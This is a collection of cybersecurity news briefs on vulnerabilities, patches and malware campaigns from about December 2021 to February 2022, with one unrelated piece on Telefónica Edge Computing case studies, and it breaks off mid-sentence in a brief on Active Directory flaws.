Microsoft disables macros and MSIX to prevent malware distribution Microsoft has been actively mobilising against multiple malware attacks that use some of its technologies as an entry vector. The products affected in particular are the Office suite and the MSIX application installers that allow developers to distribute applications for different platforms. In the case of Office, the company will disable Visual Basic for Applications (VBA) macros by default in all its products, including Word, Excel, PowerPoint, Access and Visio, for documents downloaded from the web, although they can be enabled voluntarily by the user. According to Microsoft's own publication, enabling macros in an Office file allows threat actors to deliver malicious payloads, deploy malware, compromise accounts, exfiltrate information and even gain remote access to targeted systems. The move comes just a month after the Windows vendor disabled Excel 4.0 (XLM) macros by default, another feature that is widely abused to distribute malware. Regarding MSIX application installers, Microsoft has announced that it will temporarily disable the MSIX ms-appinstaller protocol driver in Windows after evidence of active exploitation of vulnerability CVE-2021-43890, which allows the installation of unauthorised applications and is being used to deliver malware such as Emotet, TrickBot and Bazaloader. This move means that, until Microsoft fully fixes the bug, App Installer will not be able to install an app directly from a web server, so users must first download the app to their device and then install the package with the app installer. More: https://docs.microsoft.com/es-es/DeployOffice/security/internet-macros-blocked Possible exfiltration of information due to vulnerability in Argo CD Researchers at Apiiro have disclosed a vulnerability in Argo CD, a widely used tool for deploying applications in Kubernetes, which could be exploited by attackers in order to obtain sensitive information from different organisations, especially passwords and API Keys. The vulnerability has been catalogued with the identifier CVE-2022-24348 - 7.7 CVSSv3 and consists of a Path-Traversal flaw that could lead to privilege escalation, information disclosure and lateral movement attacks. Exploitation is achieved by loading a YAML file specially crafted for Kubernetes Helm Chart on the target system, as long as you have permission to create and update applications and you know the full path to a file containing a valid YAML. For its part, Argo CD released version 2.3.0-rc4 last Friday, just 5 days after Apiiro researchers alerted them to the bug. All the details: https://apiiro.com/blog/malicious-kubernetes-helm-charts-can-be-used-to-steal-sensitive-information-from-argo-cd-deployments/ Critical vulnerabilities in SAP products SAP has released its February security bulletin issuing 22 major updates, including fixes for the Log4j impact, as well as three critical memory corruption vulnerabilities affecting Internet Communication Manager (ICM), a core component of SAP's business applications. These last three flaws were discovered by SAP's product security response team, in collaboration with Onapsis Research Labs, who have named them ICMAD" (Internet Communication Manager Advanced Desync). The most critical vulnerability is already patched in SAP Security Note 3123396, identified as CVE-2022-22536 and with a CVSSv3 of 10.0, it would allow an unauthenticated attacker to prepend a victim's request with arbitrary data and thereby execute functions impersonating the victim. The remaining two bugs have also been patched by SAP in its security advisory 3123427 and correspond to CVE-2022-22532 and CVE-2022-22533 with CVSSv3 of 8.0 and 7.5 respectively. Both of these would also be exploitable by an unauthenticated remote attacker, although they only affect SAP applications running on SAP NetWeaver AS Java. It should be noted that successful exploitation of these vulnerabilities could result in severe impacts such as: theft of confidential information, ransomware and disruption of business processes and operations. SAP recommends applying SAP's February 2022 security updates as soon as possible, as well as making use of the open source tool provided by Onapsis that identifies whether a system is vulnerable and in need of patching. Discover all: https://onapsis.com/blog/sap-security-patch-day-february-2022-severe-http-smuggling-vulnerabilities-sap-netweaver Microsoft security updates Microsoft has fixed a vulnerability in Microsoft Defender antivirus on Windows that allowed attackers to distribute and execute payloads unnoticed by the malware detection engine. The flaw is due to a loosely condivd registry key containing the list of locations excluded from Microsoft Defender scanning that was visible to all users. After remediation this is visible only to users with administrator privileges. This security bug affected the latest versions of Windows 10 and would have been fixed with Microsoft's latest security updates in February. It is also worth noting that Microsoft is removing the Windows Management Instrumentation (WMIC) command line tool, wmic.exe, from the development portal in the latest versions of Windows 11, in favour of Powershell. The removal would only affect the command tool, so WMI is not affected. WMI has been widely exploited by malicious actors and is even considered a LOLBin (living-off-the-land binaries). By removing the WMIC utility, multiple attacks and malware will no longer function properly, as they will no longer be able to execute some commands necessary to carry out their operations, although it is possible that attackers will replace WMIC with new methods. More info: https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-defender-flaw-letting-hackers-bypass-antivirus-scans/ Cybercriminals exploiting Windows Regsvr32 utility to distribute malware Researchers at Uptycs have analysed a new campaign in which malicious actors are increasingly abusing a Windows LOLBin known as Regsvr32 to spread malware. LOLBins are legitimate, native utilities commonly used in computing environments that cybercriminals exploit to evade detection by blending in with normal traffic patterns. In this case, Regsvr32 is a Microsoft-signed utility in Windows that allows users to manage code libraries and register DLL files by adding information to the central directory (registry) so that it can be used by Windows and shared between programs. According to Uptycs, the utility is being abused through a technique known as Squiblydoo, where Regsvr32 is used to execute DLLs via COM scriptlets that do not make any changes to the registry. The research adds that malicious use of this utility has been on the rise lately, mainly in the registry of .OCX files hosted in various malicious Microsoft Office documents. Uptycs has analysed up to 500 malware samples that are reportedly being distributed, some of them belonging to Qbot and Lokibot. All the details: https://www.uptycs.com/blog/attackers-increasingly-adopting-regsvr32-utility-execution-via-office-documents

2021 was a turning point for the arrival of Edge Computing in our lives. Newscasts, written press, social networks, chats among friends... This term did not escape from any of our spheres because we all wanted to know what Edge Computing really was. Now that we know what it is, we wonder how, through which projects, it is being implemented. What use cases are already demanding this technology? To find out, nothing better than to learn about Telefónica Tech's case studies on this journey that will conclude with the arrival of the "real" 5G, the 5G SA (StandAlone), which will bring new capabilities. Navantia Navantia, a leading company in the manufacture of high-tech ships, has found in Telefónica the best travelling partner on the road to its digital transformation. In this project, 3 use cases of 5G Edge Computing applied to ship reparation and construction processes have been defined: 5G and Edge Computing for remote assistance 5G and Edge Computing for real time processing of 3D scanning 5G and Augmented Reality for Shipbuilding Find out all about this case study in the following video: APM Terminals APM Terminals, one of the largest operators in port, maritime and land terminal design worldwide, joins this list of Edge Computing case studies thanks to its pilot project with Telefónica. As its technology partner, Telefónica is developing a pilot project at APM Terminals' container terminal in the port of Barcelona to improve security through a combination of 5G, Edge Computing and C-V2X technology. Here we find two case studies: Geolocation and virtual positioning of fixed objects Geolocation of moving elements Learn more about this case study in the following video: IE UNIVERSITY Edge Computing has also reached classrooms and the best example of this is the case study of IE University. Together with Telefónica and Nokia, this well-known educational centre has developed an immersive experience at its Campus in Segovia, thanks to the application of 5G and Edge Computing. These are immersive virtual lessons where students learn in streaming and from their own devices. In this use case, a third key element is added to 5G and Edge Computing: Virtual Reality. If you want to know how it is possible and the role of each of these elements to make this pioneering experience a reality, press play:

New vulnerabilities in Linux Two new vulnerabilities of risk have recently been disclosed and are reportedly affecting Linux systems. If exploited, they could allow privilege escalation on the vulnerable system. CVE-2021-4034 (PwnKit): Researchers at Qualys have discovered a memory corruption flaw, which resides in polkit's pkexec program and could allow a local attacker to escalate privileges on a vulnerable system and reach root privileges. Hours after the disclosure of the Qualys article, the first proof-of- concept (PoC) was made public, which would allow this flaw to be exploited. Qualys recommends applying the available patches that the authors of Polkit have published in Gitlab. CVE-2022-0185: Buffer overflow vulnerability, which resides in the Linux kernel and could allow an attacker to escape from the Kubernetes containers and take control of the node, with the CAP_SYS_ADMIN privilege enabled as a requirement. The researchers highlight that exploitation of this flaw is straightforward, so they recommend updating as soon as possible. Crusaders of Rust (CoR), the team that discovered the flaw, has revealed that they will publish the exploit code in the coming weeks on their Github repository. More info: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034 Let's Encrypt SSL/TLS certificates revoked due to implementation error Let's Encrypt has announced in a statement that it will revoke certain SSL/TLS certificates on January 28th due to two irregularities in the implementation of the validation method. According to the statement, this will only affect certificates that were issued and validated using the TLS-ALPN-01 challenge before February 26th at 00:48 UTC, when the implementation error was corrected. They also indicate that this will only affect less than 1% of the certificates. Let's Encrypt will communicate to affected users the guidelines they will have to follow to renew their certificates. It should be noted that this is not the first time Let's Encrypt has faced a problem of this kind, as in October 2021 the DST Root CA X3 root certificates expired. All the details: https://community.letsencrypt.org/t/2022-01-25-issue-with-tls-alpn-01-validation-method/170450 Espionage campaign using OneDrive as C2 Researchers at Trellix have published details of a multi-phased espionage campaign targeting high-ranking government officials and defence employees in West Asia. The campaign began in October, but the preparation of the infrastructure could date back as far as June. The input vector would be an Excel document, possibly sent by email, which exploits a remote code execution vulnerability in MSHTML (CVE-2021-40444), fixed by Microsoft in its September update bulletin. This exploit allows the deployment of a malware known as Graphite, which uses the Microsoft Graph API in order to use OneDrive as a Command & Control server. Once the connection to the C2 is established, Empire, an open-source post-exploitation framework widely used for illicit purposes, is downloaded. Due to the multiple stages of the infection chain, which facilitate evasion, as well as the use of new techniques including OneDrive as C2 to ensure that all connections are made to legitimate Microsoft domains, we could say that we are dealing with a highly sophisticated campaign. Based on the targets, researchers point to a possible attribution to APT28 (aka Sofacy, Strontium, Fancy Bear or Sednit) of Russian origin. All info: https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/prime-ministers-office-compromised.html Apple fixes new 0-day exploit used to breach iOS devices Apple has released new security updates for iOS 15.3 y iPadOS 15.3, as well as macOS Monterey 12.2, in which it has fixed two 0-day vulnerabilities. The first of the flaws, identified as CVE-2022-22587, is a memory corruption flaw in the IOMobileFrameBuffer that affects iOS, iPadOS and macOS Monterey. Successful exploitation of this vulnerability could allow arbitrary code execution with kernel privileges on compromised devices. Apple highlights that the flaw is being actively exploited. The second 0-day, a flaw in Safari WebKit on iOS and iPadOS, would allow websites to track browsing activity and user identity in real time. This vulnerability, classified as CVE-2022-22594, was first discovered by Martin Bajanik of FingerprintJS on November 28th, but was only published on January 14th and fixed in this update. Discover more: https://support.apple.com/en-us/HT213053 Trickbot strengthens protections to evade detection and analysis IBM Trusteer researchers have analysed recent Trickbot malware campaigns, in which the operators behind the trojan have added additional layers of protection to their injections to avoid detection and analysis. These code injections are used in real time when a user with an infected device tries to access their bank account, the injections are designed to intercept and modify information leaving the browser before it reaches the bank's server. Most of the samples in which these new capabilities have been detected have been applied in cases of bank fraud, one of Trickbot's main activities. The implemented updates include a new server-side injection mechanism, encrypted communications with the C2 (Command&Control), an anti-debugging feature and new ways to obfuscate and hide the injected code. On the other hand, security researchers have reported that the operators of Emotet, malware that previously infects the device to distribute malware as trickbot in a second phase, have also improved their evasion techniques by using hexadecimal and octal IP addresses, reportedly using the same Webshells provider as TR with Qakbot or Squirrelwaffle. They have identified up to 138 sites compromised by this malware. All the details: https://securityintelligence.com/posts/trickbot-bolsters-layered-defenses-prevent-injection/

Cyber-attack campaign against Ukrainian targets The Microsoft Threat Intelligence Center team has been analysing the succession of cyberattacks against Ukrainian organisations since 13 January, which have affected at least 15 government institutions such as the Ministry of Foreign Affairs and Defence. According to investigators, this number could increase soon. As for the campaign itself, Microsoft warns that a new malware family called "WhisperGate" was used, malicious software aimed at destroying and deleting data on the victim's device in the form of ransomware. "WhisperGate" is said to consist of two executables: "stage1.exe", which overwrites the "Master Boot Record" on the hard disk to display a ransom note, whose characteristics indicate that it is a fake ransomware that does not provide a decryption key, and "stage2.exe", which runs simultaneously and downloads malware that destroys data by overwriting files with static data. Journalist Kim Zetter has indicated that the entry vector used by the malicious actors would have been the exploitation of the vulnerability CVE-2021-32648 and CVSSv3 9.1 in octobercms. Consequently, according to Ukrainian cybersecurity agencies, the actors exploited the Log4Shell vulnerability and reported DDoS attacks against its infrastructure. In addition, the US Cybersecurity and Infrastructure Security Agency (CISA) has issued a statement, warning organizations about potential critical threats following recent cyberattacks targeting public and private entities in Ukraine. Microsoft has indicated that it has not been possible to attribute the attacks to any specific threat actor, which is why they have called these actions DEV-0586. It should be noted that, as indicated by the Ukrainian authorities, due to the escalation of tensions between the Ukrainian and Russian governments, this campaign of attacks is considered to be aimed at sowing chaos in Ukraine on the part of Russia. More info: https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/ Flaw in Safari could reveal user data Security researchers at FingerprintJS have revealed a serious flaw in Safari 15's implementation of the IndexedDB API that could allow any website to track user activity on the Internet, potentially revealing the user's identity. IndexedDB is a browser API designed to host significant amounts of client-side data, which follows the "same-origin" policy; a security mechanism that restricts how documents or scripts loaded from one source can interact with other resources. Researchers have discovered that in Safari 15 on macOS, and in all browsers on iOS and iPadOS 15, the IndexedDB API is violating the same-origin policy. This would be causing that, every time a website interacts with a database, a new (empty) database with the same name is created in all other active frames, tabs and windows within the same browser session, making other websites able to see this information. FingerprintJS has created a proof of concept that can be tested from a Safari 15 or higher browser on Mac, iPhone or iPad. FingerprintJS also notes that they reported the bug to Apple on 28 November, but it has not yet been resolved. All the details: https://fingerprintjs.com/blog/indexeddb-api-browser-vulnerability-safari-15/ Microsoft releases emergency updates for Windows Following the discovery of a number of issues caused by the Windows updates issued during the last Security Bulletin in January, Microsoft released in an extraordinary way (OOB) new updates and emergency fixes for some versions of Windows 10 and Windows Server. Reports from system administrators indicate that, after deploying Microsoft's latest patches, connection problems have been reported in L2TP VPN networks, domain controllers suffer from spontaneous reboots, Hyper-V no longer starts on Windows servers and there are problems accessing Windows Resilient File System (ReFS) volumes. The fixes affect a wide range of versions of Windows Server 2022, 2012 and 2008 as well as Windows 7, 10 and 11. According to Microsoft, all updates are available for download in the Microsoft Update Catalog and some of them can also be installed directly via Windows Update as optional updates. If it is not possible to deploy them, it is recommended to remove updates KB5009624, KB5009557, KB5009555, KB5009566 and KB5009543, although it should be noted that valid fixes for the latest vulnerabilities patched by Microsoft would also be removed. More: https://docs.microsoft.com/en-us/windows/release-health/windows-message-center Cisco security flaw allows attackers to gain root privileges Cisco has released Cisco Redundancy Configuration (RCM) version 21.25.4 for StarOS software, which fixes several security flaws. The most prominent vulnerability is identified as CVE-2022-20649 CVSSv3 9.0, a critical flaw that allows unauthenticated attackers to execute remote code with root privileges on devices running vulnerable software. The source of the vulnerability is that debug mode has been improperly enabled for different specific services. To exploit the vulnerability, attackers do not need to be authenticated, but they do need to gain access to the devices, so they should first perform a detailed reconnaissance to discover which services are vulnerable. There is currently no evidence that the vulnerability is being exploited. In addition, Cisco has also patched another medium criticality vulnerability CVE-2022-20648 CVSSv3 5.3 information disclosure vulnerability. Learn more: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rcm-vuls-7cS3Nuq Google fixes bugs in Chrome Google has published a security advisory where it fixes 26 vulnerabilities that are affecting its Chrome browser. A critical vulnerability stands out among the flaws. It has been listed with the identifier CVE-2022-0289 and was discovered on January 5th by the researcher Sergei Glazunov. This vulnerability resides in Google's Safe Browsing service, which is responsible for alerting users that they are accessing a website that could have an associated risk. If exploited, this vulnerability could allow remote code execution. The rest of the vulnerabilities fixed have been classified, for the most part, as high severity, with only five of medium risk. Google recommends updating to version 97.0.4692.99, where these flaws would be fixed. All the details: https://chromereleases.googleblog.com/2022/01/stable-channel-update-for-desktop_19.html

Microsoft security bulletin Microsoft has published its January security bulletin in which it has fixed a total of 97 bugs, including six 0-day vulnerabilities and nine bugs classified as critical. Regarding the 0-days, no active exploitation of these has been detected, but it should be noted that several of them have public proofs of concept, so it is likely that they will be exploited in the short term. Regarding the security flaws classified as critical, it is worth highlighting CVE-2022-21907 (CVSS 9.8), which affects the latest versions of Windows in its desktop and server versions. This is a vulnerability in the HTTP protocol stack, the exploitation of which would result in remote code execution and which has been labelled as "wormable". The other flaw to note is another remote code execution in this case in Microsoft Office (CVE-2022-21840 CVSS 8.8), patched for Windows versions, but not yet for macOS devices. Similarly to what happened with the 0-days, according to Microsoft, no exploits have been detected for these two vulnerabilities either. More info: https://msrc.microsoft.com/update-guide/releaseNote/2022-Jan New JNDI vulnerability in H2 database console Researchers at JFrog have discovered a critical unauthenticated remote code execution vulnerability in the H2 database console. The vulnerability shares its origin with the Log4Shell (JNDI remote class loading) vulnerability and has been assigned the identifier CVE-2021-42392. H2 is a popular open source Java SQL database widely used in various projects. Despite being a critical vulnerability and sharing features with Log4Shell, the researchers indicate that its impact is minor for several reasons. Firstly, this flaw has a direct impact because the server that processes the initial request is the same server that is affected by the flaw, making it easier to detect vulnerable servers. Secondly, the default configuration of H2 is secure, unlike with Log4Shell where default configurations were vulnerable. And finally, many vendors use the H2 database but not the console, so while there are vectors to exploit the flaw beyond the console, these other vectors are context-dependent and less likely to be exposed to remote attacks. Despite attributing less risk to this new flaw than to Log4Shell, the researchers warn that for anyone running an H2 console exposed to the LAN, the flaw is critical and they should upgrade to version 2.0.206 as soon as possible. The firm has also shared guidance for network administrators to check if they are vulnerable to the new flaw. All the details: https://jfrog.com/blog/the-jndi-strikes-back-unauthenticated-rce-in-h2-database-console/ Five new URL parsing confusion flaws Researchers at Team82 and Snyk have published a research paper in which they have studied in depth how different libraries parse URLs, and how these differences in the way they parse URLs can be exploited by attackers, by analysing URL parsing confusion bugs. They have analysed a total of 16 different URL (Uniform Resource Locator) parsing libraries and have detected five kinds of inconsistencies present in some of them, which could be exploited to cause denial-of-service conditions, information exposure or even, under certain circumstances, remote code execution. The five inconsistencies observed are: scheme confusion, slash confusion, backslash confusion, URL encoded data confusion and scheme mixup. In addition to the identification of these inconsistencies, they point to the detection of eight vulnerabilities that directly affect different frameworks or even programming languages and that have already been patched except in some unsupported versions of Flask: Flask-security (Python, CVE-2021-23385), Flask-security-too (Python, CVE-2021-32618), Flask-User (Python, CVE-2021-23401), Flask-unchained (Python, CVE-2021-23393), Belledonne's SIP Stack (C, CVE-2021-33056), Video. js (JavaScript, CVE-2021-23414), Nagios XI (PHP, CVE-2021-37352) and Clearance (Ruby, CVE-2021-23435). In their study, they give a high relevance to this type of error in URL parsing, using Log4Shell as an example, since the bypass of Apache's initial bug fix was achieved thanks to the presence of two different URL parsers within the JNDI search process, each of which parsed in a different way. More: https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/ MuddyWater: Link to Iran and technical issues The Cyber National Mission Force (CNMF) of the US cybersecurity command has published a note linking the APT known as MuddyWater to Iran's Ministry of Intelligence and Security (MOIS) and details some technical aspects that have been associated with the group. MuddyWater was first identified in 2017, with targets located primarily in the Middle East, Europe and North America, and in the telecommunications, government and oil industry sectors. The release identifies some open source tools used by this malicious actor, including variants of PowGoop, samples of the Mori backdoor or sideloading DLL files to trick legitimate programmes into executing malware. Learn more: https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/ 0-day vulnerabilities detected in AWS CloudFormation and AWS Glue Security researchers at Orca Security have detected two 0-day vulnerabilities in different Amazon Web Services (AWS) services. The first of the flaws was in the AWS CloudFormation service and consisted of an XXE (XML External Entity) vulnerability, which allowed threat actors to disclose confidential files located on the vulnerable service machine, as well as the disclosure of credentials for internal AWS infrastructure services. The second vulnerability discovered affected the AWS Glue service, which stemmed from an exploitable feature that allowed the credentials needed to access the internal service's API to be obtained and could gain administrator permissions. The AWS spokesperson assured that no customer data has been affected due to the vulnerabilities in both services. It should be noted that both vulnerabilities were fixed by the AWS security team after they were reported by researchers. All the details: https://orca.security/resources/blog/aws-glue-vulnerability/

Mail delivery failure on Microsoft Exchange on-premises servers 2 January, Microsoft released a workaround to fix a bug that interrupted email delivery on Microsoft Exchange on-premises servers. The bug is a "year 2022" flaw in the FIP-FS anti-malware scanning engine, a tool that was enabled in 2013 on Exchange servers to protect users from malicious mail. Security researcher Joseph Roosen said the cause was that Microsoft used a signed int32 variable to store the value of the date, a variable that had a maximum of 2,147,483,647. The 2022 dates have a minimum value of 2,201,010,001, so they exceed the maximum number that can be stored, causing the scanning engine to fail and the mail cannot be sent. The emergency patch requires user intervention (it is a script that must be executed following certain instructions) and Microsoft warns that the process may take some time. The firm is also working on an update that will automatically solve the problem. More info: https://techcommunity.microsoft.com/t5/exchange-team-blog/email-stuck-in-exchange-on-premises-transport-queues/ba-p/3049447 Uber security flaw allows emails to be sent from its servers Security researcher Seif Elsallamy has discovered a vulnerability in Uber's email system that could allow a threat actor to send emails impersonating the company's identity. The vulnerability is in one of Uber's email endpoints, which has been publicly exposed and would allow a third party to inject HTML code and send emails pretending to be Uber. The researcher sent the digital media Bleeping Computer an email from the email address noreply@uber.com, which contained a form asking the user to confirm their credit card details, information that would later be sent to the server controlled by Seif Elsallamy. This email did not enter the spam folder because it came from Uber's servers. The researcher reported the vulnerability to Uber through HackerOne's bounty programme, but this was rejected as it required social engineering to be exploited. It is not the first time this problem has been detected, as researchers Soufiane el Habti and Shiva Maharaj reported it some time ago. Likewise, the researcher states that, due to the information leak that Uber had in 2016, there are 57 million users at risk who could receive emails pretending to come from Uber. Bleeping Computer has also contacted Uber but has not received a response yet. Full details: https://www.bleepingcomputer.com/news/security/uber-ignores-vulnerability-that-lets-you-send-any-email-from-ubercom/ Out-of-band update for Windows Server bugs Microsoft released an out-of-band update yesterday that sought to resolve some bugs reported by Windows Server users. Some users of Windows Server 2019 and 2012 R2 were reportedly encountering problems of excessive slowness or terminals going black. In some cases, there could also be failures when accessing servers via remote desktop. The patch for these versions is not available in Windows Update and will not be installed automatically. Instead, affected users should follow the instructions provided by Microsoft in its release. All other versions of Windows Server are expected to receive similar patches in the coming days. Learn more: https://docs.microsoft.com/en-us/windows/release-health/windows-message-center#2772 Evasive techniques of Zloader malware Researchers at Check Point Research have analysed the new evasive techniques of the Zloader banking malware. In the new campaign analysed, which they attribute to the MalSmoke group and which they indicate to have been running since November 2021. The infection begins with the installation of Altera Software, a legitimate IT remote monitoring and management tool, and is used to gain initial access in a stealthy manner. Besides the use of a legitimate tool, the actors make use of malicious DLLs with a valid Microsoft signature to evade detection. To do so, actors exploit the CVE-2013-3900 flaw, a vulnerability known to Microsoft since 2013, whose patch is disabled by default and which allows an attacker to modify signed executables by adding malicious code without invalidating the digital signature. Full information: https://research.checkpoint.com/2022/can-you-trust-a-files-digital-signature-new-zloader-campaign-exploits-microsofts-signature-verification-putting-users-at-risk/ Elephant Beetle: a group with financial motivations Sygnia's incident response team has published an article in which they present the analysis of Elephant Beetle, a financially motivated group that is attacking multiple companies in the Latin American sector, and which they have been tracking for two years. Also classified as TG2003, this group spends long periods of time analysing its victim, as well as its transfer system, going unnoticed by security systems by imitating legitimate packages and using an arsenal of more than 80 tools of its own. Elephant Beetle's preferred entry vector is leveraging legitimate Java applications deployed on Linux systems. Sygnia highlights the exploitation of old, unpatched vulnerabilities such as: CVE-2017-1000486 (Primetek Primeface), CVE-2015-7450 (WebSphere), CVE-2010-5326 or EDB-ID-24963 (SAP NetWeaver). Once the victim has been studied, it creates fraudulent transactions of small amounts that mimic the company's legitimate movements. Although the attribution is not yet clear, Sygnia explains that, after multiple analyses carried out on incidents involving Elephant Beetle where they have located patterns such as the word "ELEPHANTE" or multiple C2s that were located in Mexico, it could have a connection with Spanish-speaking countries, more specifically with Latin America, and Mexico could be the area of origin. More: https://f.hubspotusercontent30.net/hubfs/8776530/Sygnia- Elephant Beetle_Jan2022.pdf

Smishing campaign impersonating MRW and Sending using real order data Numerous Twitter users are reporting a smishing campaign in which the logistics companies Sending and MRW are being impersonated. The first reports were made on 26 December, when customers of brands such as Pampling, Druni and Primor reported that Sending, their courier service provider, had suffered an incident and that SMS messages were being sent in the name of Sending requesting bank details in order to complete the delivery of an order. What is relevant in this case is that the SMSs received referred to real orders that had been placed, according to the users themselves, which is why a possible leak of information at Sending has been raised, which is being used by the attackers to give credibility to the SMSs sent. The SMSs include personal information such as the name and type of order, as well as a URL that refers to an illegitimate domain "envios-sending[.]com", together with a parameter created so that the phishing can only be viewed by the user. When accessing the link, a phishing case can already be seen with a request for the user's bank details in order to formalise the sending. In the last hours of yesterday afternoon, reports of cases against MRW for the same fraud also began, forcing the company to launch a notification to its users warning them of the importance of not entering bank details requested via SMS. In this case, as with Sending, an illegitimate domain "envios-mrw[.]com" was also used. Since the beginning of this campaign, users on social networks denounced a "hacking" of these companies, this hypothesis was confirmed in a statement issued by MRW on 29 December, where they indicated that they had notified a security breach to the Spanish Data Protection Agency, stating that the identity and contact details of the receivers had been affected. On the other hand, Sending warned its users about the security breach on the 27th by SMS. All the details: : https://www.mrw.es/comuns/noticia/sms-mrw-smishing.pdf Vulnerabilities in DataVault storage encryptions Security researchers have reported two new vulnerabilities in DataVault software, and its derivative systems, used for data encryption in storage solutions from WD (owner of SanDisk), Sony or Lexar. One of the flaws is due to the use of a cryptographic hash with a predictable salt, which makes them vulnerable to dictionary attacks (CVE-2021-36750). The software also employs a password hash with insufficient computational effort, which would allow an attacker to obtain user passwords through brute force attacks, thus exposing the data to unauthorised access (CVE-2021-36751). Both flaws in the key derivation feature have been resolved in DataVault version 7.2, so it is recommended that the software be upgraded to that version immediately. More info: https://pretalx.c3voc.de/rc3-2021-r3s/talk/QMYGR3/ LastPass user master password exposure reports Several users have reported in recent hours a possible compromise of their LastPass password manager master password. The reports come after they received a lockout notice of unauthorised access to their LastPass account from an unknown location. According to the company, no evidence has been found of the exposure of their data, meaning that the blocking would have been carried out because the users had reused these credentials in other services, so that they could have been exposed as a result of their use in those other services, and could be susceptible to being used in credential stuffing attacks. However, this justification by LastPass does not fit, according to some users, with the reports that they have allegedly received again after setting up new unique passwords. It is also raised as a possibility that the warnings were sent in error. It is unknown, therefore, whether or not there has been any exposure of credentials and the vector by which they could have been exposed. For his part, researcher Bob Diachenko has checked whether some of the users who have reported having received the warnings were included among those affected by malware such as RedLine, also ruling out this option. LastPass has recommended activating two-factor authentication to prevent unauthorised access. This incident highlights the importance of never reusing passwords between services, especially when it is the main password of a password manager. All the information: https://www.bleepingcomputer.com/news/security/lastpass-users-warned-their-master-passwords-are-compromised/ New arbitrary code execution vulnerability in Log4j This week, security researcher Yaniv Nizry spread once again chaos with a Twitter post warning of the discovery of a new remote code execution vulnerability in Log4j, affecting the latest version 2.17.0. Some prominent researchers such as Kevin Beaumont invited people to remain calm until more details were known and, within minutes of the publication, they warned of the detection of alleged exploits for this new bug that were nothing more than trojans; a common practice when media bugs such as the current one are reported. A few hours later, the researcher Marc Rogers published the CVE associated with this new vulnerability, CVE-2021-44832, and also indicated that the exploitation of this flaw requires a prior change in the default conditions, which complicates its exploitation. This same idea was immediately shared by other renowned researchers such as Will Dorman, who yesterday, after Yaniv Nizry's research was made public, criticised Checkmarx, the researcher's firm, for creating a situation of alarm with this new flaw. Exploiting this flaw requires the attacker to have administrator permissions on the very system to be compromised, since, in order to exploit it, the attacker must first be able to modify the logging configuration file. This idea does not make much sense in itself, but some users insist on pointing to the div of the insider, who modifies the file, as a possible risk (although it is true that, if there is an insider, there are other greater risks). That said, we are therefore dealing with an arbitrary code execution vulnerability, not a remote execution vulnerability as initially thought, and it would have received a moderate criticality, with a CVSSv3 of 6.6. The specific flaw is due to the lack of additional controls on JDNI access in Log4j. Apache has now released version 2.17.1 to fix the bug. Despite the self-attribution of the bug by Yaniv Nizry, who has also published an article detailing his research, Apache has not included his name in the credits for the vulnerability. Know more: https://logging.apache.org/log4j/2.x/security.html#CVE-2021-44832

New campaign distributing the Anubis banking trojan Researchers at Lookout have reported a malicious campaign distributing a new version of the Anubis banking trojan obfuscated in an Android mobile app pretending to be from the French telecommunications company Orange. Malicious actors have reportedly targeted a total of 394 financial apps such as banks, cryptocurrency wallets and virtual payment platforms with the aim of exfiltrating credentials from these services. Anubis is a banking trojan that has been known since 2016 and whose development has never stopped. Once installed on the victim's device, it works by displaying fraudulent login forms for the applications it targets in order to compromise the user's credentials, as well as other functions such as screen and sound recording, sending and reading SMS or scanning the device for files of interest to exfiltrate. According to the investigation, the distribution of the fraudulent Orange app is reportedly carried out via malicious websites, direct messages on social networks, smishing and forum postings. More info: https://www.bleepingcomputer.com/news/security/anubis-android-malware-returns-to-target-394-financial-apps/ Log4Shell vulnerability Last Friday December 10, a 0-day vulnerability in Apache Log4J was reported defined as CVE-2021-44228. The vulnerability, affects the Java Apache Log4J 2 registry library, used by diverse applications of companies around the world, when dealing with an open source library. The exploitation of this flaw would allow the execution of malicious code on servers or application clients. The risk related to this vulnerability came from different factors that were combined: On day 9, the day before publishing the corrected version, an exploit was already available for this vulnerability. The exploitation is simple. Log4J is used worldwide in many web applications. This vulnerability was initially corrected in Log4J 2.15.0. However, a few days later a second vulnerability was known as CVE-2021-45046, derived from an incomplete correction of the Log4Shell vulnerability and the Log4J 2.16.0 version was launched to definitively correct the vulnerabilities. Initially, this second vulnerability was cataloged as a denial of service and given a 3.7 CVSSv3, although, in the last hours, the risk has been modified to 9 and its category to remote code execution. After the publication of this vulnerability, it has been known the presence of various exploit attempts for the vulnerability, such as the infection attempt with botnets for the installation of cryptominers, as well as its use for distributing ransomware (Khensai) or the distribution of the Trojan Stealthloader. It is important to highlight, that there is evidence of its previous exploitation on December 9, even though the mass exploitation would have led to the publication of the exploit. Regarding the affected products, the complete list has not been defined yet. During the week, the affected products were slowly known, being the most complete list published by the Nationaal Cyber Security Centrum (NCSC-NL). More details: https://logging.apache.org/log4j/2.x/security.html Emotet returns to using Cobalt Strike Security researchers warned yesterday that, after a brief pause in Emotet's operations last week, threat actors have once again begun installing Cobalt Strike beacons on Emotet-infected devices. As reported by security researcher Joseph Roosen from the Cryptolaemus threat group, Emotet is downloading the Cobalt Strike modules directly from its Command & Control server and then executing them on infected devices. In this way, the attackers gain immediate access to the compromised networks. To do so, the threat actors use a malicious jQuery file to communicate with the C2 and receive further instructions. Despite being a malicious file, most of the code is legitimate, making it easier to evade the victim's security systems. Due to the increase of Cobalt Strike beacons distributed to already infected computers, companies are expected to experience an increase in security incidents in the coming months. All the details: https://www.bleepingcomputer.com/news/security/emotet-starts-dropping-cobalt-strike-again-for-faster-attacks/ New exploits for vulnerabilities already fixed by Microsoft In the last few hours, new exploits have been detected for several vulnerabilities that were fixed in previous Microsoft bulletins: CVE-2021-42287 and CVE-2021-42278. The first of the flaws, CVE-2021-42287 CVSSv3 of 8.8 is an escalation of privilege vulnerability in Active Directory domain services, fixed by Microsoft in its security bulletin last May. This flaw, according to Microsoft itself, affects the Kerberos Privilege Attribute Certificate (PAC) and allows an attacker to impersonate domain controllers. To exploit it, a compromised domain account could have the Key Distribution Centre (KDC) create a service ticket (ST) with a higher privilege level than the compromised account. The attacker would achieve this by preventing the KDC from identifying which account holds the higher-privileged ST. If this flaw is chained with 